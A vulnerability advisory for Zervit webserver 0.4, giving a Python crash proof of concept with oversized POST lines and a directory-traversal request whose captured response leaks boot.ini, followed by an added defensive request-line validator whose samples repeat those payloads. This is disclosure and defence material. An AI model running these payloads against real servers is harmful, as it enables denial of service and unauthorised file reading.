Zervit webserver 0.4 Directory Traversal & Memory Corruption
By: e.wiZz! & shinnai
Site: shinnai.net & balcansecurity.com
[Memory Corruption] ########################################################################
import socket

host = "127.0.0.1"
port = 8080

try:
    for i in range(1,10):
        buff = "a" * 3330
        request = "POST " + buff + " HTTP/1.0"
        connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connection.connect((host, port))
        connection.send(request)
except:
    raw_input('\n\nUnable to connect. Press "Enter" to quit...')

[Directory traversal] #################################################################################
[Request]
GET /../../../../../boot.ini HTTP/1.1
User-Agent: Opera/9.64 (Windows NT 5.1; U; en) Presto/2.1.1
Host: localhost:80
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Connection: Keep-Alive, TE
TE: deflate, gzip, chunked, identity, trailers
#################################################
[Response]
HTTP/1.1 200 OK
Server: Zervit 0.4
X-Powered-By: Carbono
Connection: close
Accept-Ranges: bytes
Content-Type: application/octet-stream
Content-Length: 355

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /NOEXECUTE=OPTIN /FASTDETECT
##################################################
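
A server-side check that refuses both requests shown above, as an added example that is not part of the original advisory or of Zervit's code. The document root `/srv/www`, the 2048-byte request-line cap and the name `resolve_target` are assumptions.

```python
import posixpath
from urllib.parse import unquote

MAX_REQUEST_LINE = 2048  # assumed cap; the PoC above sends a 3330-byte target
DOCROOT = "/srv/www"     # assumed document root


def resolve_target(docroot, request_line):
    """Return (status, path); path is set only when it lies inside docroot."""
    if len(request_line) > MAX_REQUEST_LINE:
        return 414, None  # refuse oversized lines before any parsing or copying
    parts = request_line.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return 400, None
    path = unquote(parts[1].split("?", 1)[0])  # drop query, decode exactly once
    # NUL, backslash and colon cover Windows separators, drive letters and
    # alternate data streams that a plain "../" filter would miss.
    if not path.startswith("/") or any(c in path for c in "\x00\\:"):
        return 400, None
    if ".." in path.split("/"):
        return 403, None  # reject dot-dot segments rather than rewriting them
    root = posixpath.normpath(docroot)
    candidate = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return 403, None  # containment check after normalization
    return 200, candidate


# Constructed sample request lines, modelled on the two requests in the advisory.
SAMPLES = [
    "GET /index.html HTTP/1.1",
    "GET /../../../../../boot.ini HTTP/1.1",
    "GET /%2e%2e/%2e%2e/boot.ini HTTP/1.1",
    "GET /..%5c..%5cboot.ini HTTP/1.1",
    "POST " + "a" * 3330 + " HTTP/1.0",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(resolve_target(DOCROOT, line), line[:60])
```
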